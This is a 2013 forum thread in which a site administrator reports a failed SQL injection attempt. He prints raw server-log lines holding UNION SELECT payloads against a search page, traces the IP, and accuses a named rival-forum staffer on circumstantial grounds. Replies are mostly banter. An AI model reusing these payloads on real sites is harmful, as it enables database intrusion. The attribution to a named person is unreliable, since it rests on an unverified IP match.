Page 1 of 7

Malicious Attacks on Websites

Posted: Sat Aug 03, 2013 12:25 am
by Col. Khaddafi
OK, I promised I'd let everyone in on what exactly hapenned regarding this site's first ever hacking attempt.

First of all, This occurred about 8 months ago, but I only got aware of what had been tried since about one month. Indeed, my busy schedule kept me from doing a rundown of the server logs, so as to check if there wasn't something out of the common. I was looking for stuff like oddly excessive traffic and other assorted stuff. With >48,000 spam accounts blocked in less than one year :rolleyes2:, one cannot be careful enough, right? Since I am not by formation an expert in Internet security, I figured it wouldn't be a bad idea to do a quick cursory look on the server logs, in search for some common hacks/exploits attempts.

The several searches I carried out yielded only one result
n
SQL database hacking attempt

Code: Select all

74.137.34.86 - - [23/Nov/2012:00:30:36 +0000] "GET /search.php?undefined=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype%20=%20%27U%27%20--&keywords=Search%20this%20forum%E2%80%A6&=Search&fid[0]=58 HTTP/1.1" 200 2857 "-" "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0" 74.137.34.86 - - [23/Nov/2012:00:30:37 +0000] "GET /search.php?keywords=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype%20=%20%27U%27%20--&=Search&fid[0]=58 HTTP/1.1" 200 2857 "-" "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0" 74.137.34.86 - - [23/Nov/2012:00:30:37 +0000] "GET /search&# 46;php?keywords=Search%20this%20forum%E2%80%A6&=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype%20=%20%27U%27%20--&fid[0]=58 HTTP/1.1" 200 2857 "-" "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0" 74.137.34.86 - - [23/Nov/2012:00:30:38 +0000] "GET /search.php?keywords=Search%20this%20forum%E2%80%A6&=Search&fid[0]=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype%20=%20%27U%27%20-- HTTP/1.1" 200 2857 "-" "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0" 74.137.34.86 - - [23/Nov/2012:00:30:39 +0000] "GET /search.php?undefined=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype%20=%20%27U%27%20--&keywords=Search%E2%80%A6&=Search HTTP/1. 1" 200 2857 "-" "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0" 74.137.34.86 - - [23/Nov/2012:00:30:39 +0000] "GET /search.php?keywords=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype%20=%20%27U%27%20--&=Search HTTP/1.1" 200 2857 "-" "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0" 74.137.34.86 - - [23/Nov/2012:00:30:40 +0000] "GET /search.php?keywords=Search%E2%80%A6&=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype%20=%20%27U%27%20-- HTTP/1.1" 200 2857 "-" "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0" 74.137.34.86 - - [23/Nov/2012:00:32:16 +0000] "GET /search.php? undefined=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype%20=%20%27U%27%20--&keywords=Search%E2%80%A6&=Search HTTP/1.1" 200 7979 "-" "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0" 74.137.34.86 - - [23/Nov/2012:00:32:17 +0000] "GET /search.php?keywords=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype%20=%20%27U%27%20--&=Search HTTP/1.1" 200 2829 "-" "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0" 74.137.34.86 - - [23/Nov/2012:00:32:17 +0000] "GET /search.php?keywords=Search%E2%80%A6&=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype%20=%20%27U%27%20-- HTTP/1.1" 200 7979 "-" "Mozilla/5.0 (Windows NT 5.2; WOW64; rv: 16.0) Gecko/20100101 Firefox/16.0" 74.137.34.86 - - [23/Nov/2012:00:37:41 +0000] "GET /search.php?undefined=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype%20=%20%27U%27%20--&keywords=Search%E2%80%A6&=Search HTTP/1.1" 200 7977 "-" "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0" 74.137.34.86 - - [23/Nov/2012:00:37:42 +0000] "GET /search.php?keywords=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype%20=%20%27U%27%20--&=Search HTTP/1.1" 200 2829 "-" "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0" 74.137.34.86 - - [23/Nov/2012:00:37:43 +0000] "GET /search.php?keywords=Search%E2%80%A6&=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name% 20FROM%20sysObjects%20WHERE%20xtype%20=%20%27U%27%20-- HTTP/1.1" 200 7977 "-" "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0" 74.137.34.86 - - [23/Nov/2012:01:09:15 +0000] "GET /search.php?undefined=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype%20=%20%27U%27%20--&keywords=Search%E2%80%A6&=Search HTTP/1.1" 200 8473 "-" "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0" 74.137.34.86 - - [23/Nov/2012:01:09:16 +0000] "GET /search.php?keywords=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype%20=%20%27U%27%20--&=Search HTTP/1.1" 200 3078 "-" "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0" 74.137.34. 86 - - [23/Nov/2012:01:09:17 +0000] "GET /search.php?keywords=Search%E2%80%A6&=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype%20=%20%27U%27%20-- HTTP/1.1" 200 8473 "-" "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0" 74.137.34.86 - - [23/Nov/2012:01:09:40 +0000] "GET /search.php?undefined=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype%20=%20%27U%27%20--&keywords=Search%E2%80%A6&=Search HTTP/1.1" 200 8474 "-" "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0" 74.137.34.86 - - [23/Nov/2012:01:09:41 +0000] "GET /search.php?keywords=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype%20=%20%27U%27%20--&=Search HTTP/1.1" 200 3078 "-" "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0" 74.137.34.86 - - [23/Nov/2012:01:09:42 +0000] "GET /search.php?keywords=Search%E2%80%A6&=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype%20=%20%27U%27%20-- HTTP/1.1" 200 8473 "-" "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0" 74.137.34.86 - - [23/Nov/2012:01:10:03 +0000] "GET /search.php?undefined=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype%20=%20%27U%27%20--&keywords=Search%E2%80%A6&=Search HTTP/1.1" 200 8473 "-" "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0" 74.137.34.86 - - [23/Nov/2012:01:10:04 +0000] "GET / search.php?keywords=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype%20=%20%27U%27%20--&=Search HTTP/1.1" 200 3078 "-" "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0" 74.137.34.86 - - [23/Nov/2012:01:10:05 +0000] "GET /search.php?keywords=Search%E2%80%A6&=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype%20=%20%27U%27%20-- HTTP/1.1" 200 3104 "-" "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0"
The first thing I found weird was the attempt at hijacking the SQL database of the server. Odd I thought. Then I did a quick search to the offending IP (74.137.34.86) expecting to have a hit from typical places such as Russia, Ukraine, China, or even France. Yet lo and behold, the IP came from Kentucky,
US.

Here is the whois result for that IP:
Whois 74.137.34.86

Code: Select all

NetRange: 74.128.0.0 - 74.143.255.255 CIDR: 74.128.0.0/12 OriginAS: NetName: INSIGHT-COMMUNCATIONS-CORP NetHandle: NET-74-128-0-0-1 Parent: NET-74-0-0-0-0 NetType: Direct Allocation RegDate: 2006-04-07 Updated: 2012-02-24 Ref: http://whois.arin.net/rest/net/NET-74-128-0-0-1 OrgName: INSIGHT COMMUNICATIONS COMPANY, L.P. OrgId: INSIG-7 Address: 10200 Linn Station Road Address: Suite 125 City: Louisville StateProv: KY PostalCode: 40223 Country: US RegDate: 2005-02-07 Updated: 2012-03-28 Ref: http://whois.arin.net/rest/org/INSIG-7
That
also seemed... odd...

My first reflex was to check the look for any hits of this IP on this site. I found out that this was an IP the "Jesus" account had posted three times from on this site.

Everyone knew that "Jesus" was Feyd_Ruin from MTGS, since at the time he requested that some former user "Jesus" surrendered his forum name (he changed it to "Iesus") so that he could find his "rightful" name.

Knowing that Feyd_Ruin had tried to hijack the site's SQL database (Although through outdated exploits, which means he achieved no illegitimate access, I could confirm this myself), I tried to dig deeper on this hacking attempt logs. All this occurred the 23rd November 2012, during the space of 40min. I went to re-check what was ocurring both here (the postings at that time) and on MTGS (the leaked mod lounge posts we were sent by a honorable staff member of MTGS), and the major event that occurred at that time was Sene posting
his discontent about the MTGS Razzies (The legendary post that was at the onset of the Blathering threads legacy) just the day before:

22nd November 2012
One would think you'd move on and try to focus your considerable resources on building your own welcoming & quality community to rival MTGS, instead of making this a site an outlet for pettiness and satisfying personal grudges.

Just saying.
At about the same time we had received this info about the MTGS mod lounge:

16th November 2012
Feyd_Ruin applied for tech. He's now making magic tricks in Mod Chat with HTML and BBcode to impress the kids so they hire him.
And it is not difficult to make the logic leap that one of the tricks he tried was hijacking this site's
database, perhaps to snitch on the honorable person who has been sharing us the info about the deceit and lies that MTGS has pulled on many of this site's members.

I withheld this info for some more time because I wanted some independent confirmation that an IP search on this IP gave hits on MTGS, and I've been told this week that this is correct and points to no other than Feyd_Ruin.

For me there can be no doubts that a technician of MTGS tried to hack the database of this site, probably on a futile attempt to expose the person who alerted us on the sale of MTGS and the true reasons behind the mass bannings at MTGS (which apparently are being reenacted one year after).

I was really dumbfounded by this because I honestly thought this pointless conflict would stop at just bemoaning and demonising people like myself, with just slander about the so-called "malicious actions" that I took against MTGS (exposing the sale to Curse as the real reason behind the shutdown of a subforum of MTGS and
the persecution towards is members, for the simple reason that the subforum wouldn't conform to the future TOS of the site). I would never imagine that a current staff member of MTGS would go as far as trying to hack this site, and to be honest, I'm not even mad. I just find this more sad than anything else.

So there you go. You people know everything about this affair. I know there are many decent people on the lower ranks of MTGSalvation staff, and I welcome them to search 74.137.34.86 on their IP lookup tools.

Posted: Sat Aug 03, 2013 12:26 am
by rezombad
first

Posted: Sat Aug 03, 2013 12:29 am
by rezombad
neat read

:rate5: :rate5: / :rate5: :rate5:

Posted: Sat Aug 03, 2013 12:50 am
by iamabadman
vote to ban jesus.

Posted: Sat Aug 03, 2013 2:04 am
by Sir Sapphire the 3rd
Vote to burn

Posted: Sat Aug 03, 2013 2:27 am
by Kazekirimaru
vote to ban jesus.
He'll just come back three days later.

Posted: Sat Aug 03, 2013 2:29 am
by Sir Sapphire the 3rd
And now who is(are) the scumbag(s) now?

Posted: Sat Aug 03, 2013 2:35 am
by iamabadman
vote to ban jesus.
He'll just come back three days later.

not if you do it right

Posted: Sat Aug 03, 2013 3:56 am
by Second Harkius
Wow

Posted: Sat Aug 03, 2013 3:58 am
by Kaitscralt
Did Feyd get the job? That's the real question.

Posted: Sat Aug 03, 2013 4:21 am
by rezombad
I think so. Hes usually offline fr weeks at a time though. Maybe he should get unmodded for inactivity

Posted: Sat Aug 03, 2013 4:45 am
by Kaitscralt
Seems like a good CI thread, why is hacking DTR a bullet point on a resume that MTGS is looking for?

Posted: Sat Aug 03, 2013 7:24 am
by Tom Servo
:mob:

Posted: Sat Aug 03, 2013 7:24 am
by Tom Servo
Seems like a good CI thread, why is hacking DTR a bullet point on a resume that MTGS is looking for?
Good question

Posted: Sat Aug 03, 2013 7:30 am
by Tom Servo

Posted: Sat Aug 03, 2013 7:47 am
by Mcdonalds
So I needed more proof that MTGS is managed by children, for children?

Posted: Sat Aug 03, 2013 7:56 am
by Captain Murphy
Jesus called he said he's sick of the disses

Posted: Sat Aug 03, 2013 7:56 am
by Captain Murphy
I told him to quit bitchin, this isn't a fuckin hotline

Posted: Sat Aug 03, 2013 8:25 am
by Pendulum
In his defense, it wasn't like he tried really hard. I actually had to delve pretty deep into the archives to find that nosploit. Union selects are garbage against internet forum software, any skiddy can tell you that, and like I keep saying Debian has some of the cleanest tiers I've seen so there was like a negative percentage chance that it would work. Plus let's not forget that proxying an IP is like the simplest thing ever. Not that I'm not saying I don't believe it, just laying out the counterargument.

Posted: Sat Aug 03, 2013 8:52 am
by Pendulum
Oh crap. Insight Communications apparently has been bought out by Time Warner, that's going to make getting to the bottom of this much stickier.

Posted: Sat Aug 03, 2013 9:21 am
by Pendulum
Lol, their "24 hour 7 day a week" line just takes you to an automated message to call back during business hours. Don't believe their lies, they're in on it too!

Posted: Sat Aug 03, 2013 9:22 am
by Pendulum
This goes all the way to the top, people.

Posted: Sat Aug 03, 2013 9:59 am
by Alex
Oh crap. Insight Communications apparently has been bought out by Time Warner, that's going to make getting to the bottom of this much stickier.
This means they must be destroyed.

Posted: Sat Aug 03, 2013 10:03 am
by Alex
In fact, I dare say we take them to the fuckyoufarm.

Posted: Sat Aug 03, 2013 12:42 pm
by Captain Murphy
bump away form spambot

Posted: Sat Aug 03, 2013 12:58 pm
by Checkbox
I wonder what iridium has to say about this...

Posted: Sat Aug 03, 2013 1:06 pm
by iamabadman
THEY UNLEASHED A SPAMBOT ON US!

Posted: Sat Aug 03, 2013 6:32 pm
by Blackhound
I wonder what iridium has to say about this...
It was a misunderstanding.

That or it was a reclimation defence.

Posted: Sat Aug 03, 2013 6:42 pm
by ExarionUniverse1
nice fib N_S

Posted: Sat Aug 03, 2013 6:43 pm
by Checkbox
ok seriously, shut the fuck up onar

Posted: Sat Aug 03, 2013 6:53 pm
by Alex
I wonder what iridium has to say about this...
Feigning ignorance would probably be the smart play.

That being said they'd probably just blame Madding somehow.

Posted: Sat Aug 03, 2013 6:55 pm
by Blackhound
[color=#HUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU80BFFF][/color]

Posted: Sat Aug 03, 2013 6:55 pm
by Blackhound
THAT FUCKING WORKED.

Posted: Sat Aug 03, 2013 9:21 pm
by Kaitscralt
Don't blame me, blame Belza

Posted: Sat Aug 03, 2013 9:21 pm
by Kaitscralt
Or in her absence, blame blame_Belza

Posted: Sat Aug 03, 2013 9:34 pm
by Alex
Don't blame me, blame Belza
You can't dodge this hammer, heathen!

Posted: Sat Aug 03, 2013 10:38 pm
by TubeHunter
Dis shit be cray

Posted: Sun Aug 04, 2013 1:58 am
by Sir Sapphire the 3rd
nice fib N_S
Image

Posted: Sun Aug 04, 2013 3:36 am
by Tom Servo
I want to blather here, but this isn't a blather thread :gonk:

Posted: Sun Aug 04, 2013 3:36 am
by Tom Servo
It's got guests though